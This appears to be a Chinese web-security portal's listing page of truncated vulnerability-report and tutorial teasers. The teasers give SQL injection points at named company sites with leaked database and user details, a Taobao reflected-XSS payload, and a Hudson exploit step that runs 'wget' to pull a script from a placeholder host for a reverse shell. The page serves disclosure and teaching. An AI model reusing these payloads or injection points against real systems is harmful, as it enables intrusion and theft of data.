书旗小说网SQL注射漏洞及修复 - 网站安全 - 自学关注热度:13

由于没有对参数进行正确过滤，导致SQL注射漏洞漏洞证明：注入点:http://yc.shuqi.com/yc_pagefile/boat.php?action=notice_infonoid=177数据库:book_new版本:5.0.90-log用户名:ppro@172.18.20.215得到的表和用户....[详情]

淘宝网2处反射型xss - 网站安全 - 自学php关注热度:13

http://fang.taobao.com/fang/activities/getLotteryInfo.html?callback=scriptalert(/goderci/)/script【IE 6测试】http://kezhan.trip.taobao.com/remote/citySearch.do?callback={callback}q=11111im.....[详情]

申通快递+如风达快递SQL注入 - 网站安全 - 自学关注热度:12

建议做一下过滤作者Falcon..[详情]

同仁堂集团网站sql注入及修复 - 网站安全 - 自学关注热度:8

中国北京同仁堂（集团）官网存在sql注入漏洞。。好歹也市值:191.53亿元。。详细说明：http://www.tongrentang.com/trtxsqy/introduce_yc.php?id=#39;%60%228rk1BError: exception #39;PDOException#39; wi.....[详情]

Postgresql注入语法指南 - 网站安全 - 自学php关注热度:21

作者：Nana本文很抱歉没有实例，没有截图。像我这个不善于Google的人来说，要找一个Postgresql的注入实例还是不太容易，所以，不解释。只有枯燥的语句，和回显作为例子。SQL软件中，不..[详情]

千博企业网站管理系统HitCount.Asp页面注入漏洞关注热度:13

程序都加入了防注入代码的，在NoSql.asp文件中7kccopyd-code%If EnableStopInjection = True Then Dim Fy_Post, Fy_Get, Fy_In, Fy_Inf, Fy_Xh, Fy_db, Fy_dbstr Fy_In = rsquo;|;|and|exec|i.....[详情]

首家实名制相亲平台我在找你任意命令执行 - 网关注热度:12

Hudson版本太低，无用户验证功能，可直接任意执行系统命令漏洞证明：http://59.151.1.116:8080/script反弹shelljava.lang.Runtime.getRuntime().exec(#39;wget http://www.XXX.com/uploads/XX.pl -O /tmp/XX.....[详情]

拍客piikee竞拍网站系统注射漏洞及修复 - 网站安关注热度:15

因没有厂商，就写个竞拍系统吧，传出来好给用这系统的站长提个醒。该系统名为：拍客piikee竞拍网站系统为什么说2B那？前台所有文件参数值都这样来的，大家看下这段代码news_arc.ph..[详情]

北京汽车集团官网SQL注射漏洞及修复 - 网站安全关注热度:16

由于没有对参数进行正确过滤，导致SQL注射漏洞详细说明：http://www.baihc.com/website/news_content.php?id=322type=1,此URL的ID字段由于没有对参数进行正确过滤，导致SQL注射漏洞漏洞证明：注入点..[详情]

网站服务器被挂马的处理方案 - 网站安全 - 自学关注热度:14

www.2cto.com：有360软文嫌疑啊本方案主要解决网站的WEB服务器出现木马的情况后，操作指导手册。根据先期摸索处理的经验，整理此文档，若有不足，请指出补充。前言：服务器木马的防..[详情]

Wordpress插件Zingiri Web Shop <= 2.4.0多个xss问题 - 网关注热度:10

Wordpress Zingiri Web Shop Plugin = 2.4.0 Multiple XSS Vulnerabilities作者: Mehmet Ince www.2cto.com程序作者: http://www.zingiri.com影响版本: 2.3.0 和 2.4.0已测试标题： Wordpress.....[详情]

PHP Volunteer Management 1.0.2多个缺陷及修复 - 网站安关注热度:12

标题: PHP Volunteer Management #39;id#39; 1.0.2 Multiple Vulnerabilities作者: G13 www.2cto.com下载地址: https://sourceforge.net/projects/phpvolunteer/影响版本: 1.0.20x01 描述0x02 XS.....[详情]

从分析代码学习挖掘漏洞 - 网站安全 - 自学php关注热度:13

作者注：近日看到论坛上有人发了个全能大牛的文章，颇有感慨。其实所谓的全能，是来自对基础知识的扎实根基。本文虽谈不上全能，也并非什么大做，仅为证明只要根基扎实，你也..[详情]

POST表单与上传突破JS后缀名检查分析 - 网站安全关注热度:14

本文纯属科普文，在看本文前，请简单了解一下GET与POST的区别：《网站表单接收信息提交方式：Get与Post 小讲》如果这个文章你没看懂，或者不想看，那么我来给你更简单的讲一下GET与..[详情]

网站表单接收信息提交方式：Get与Post小讲 - 网站关注热度:20

这个是涉及网络传输安全的，这对SQL注入检测也是至关重要的给大家科普下浏览网站时，网站服务器获取数据主要靠两种方式：Get与postGet：GET是一个HTTP将各种信息提交到服务器方法。..[详情]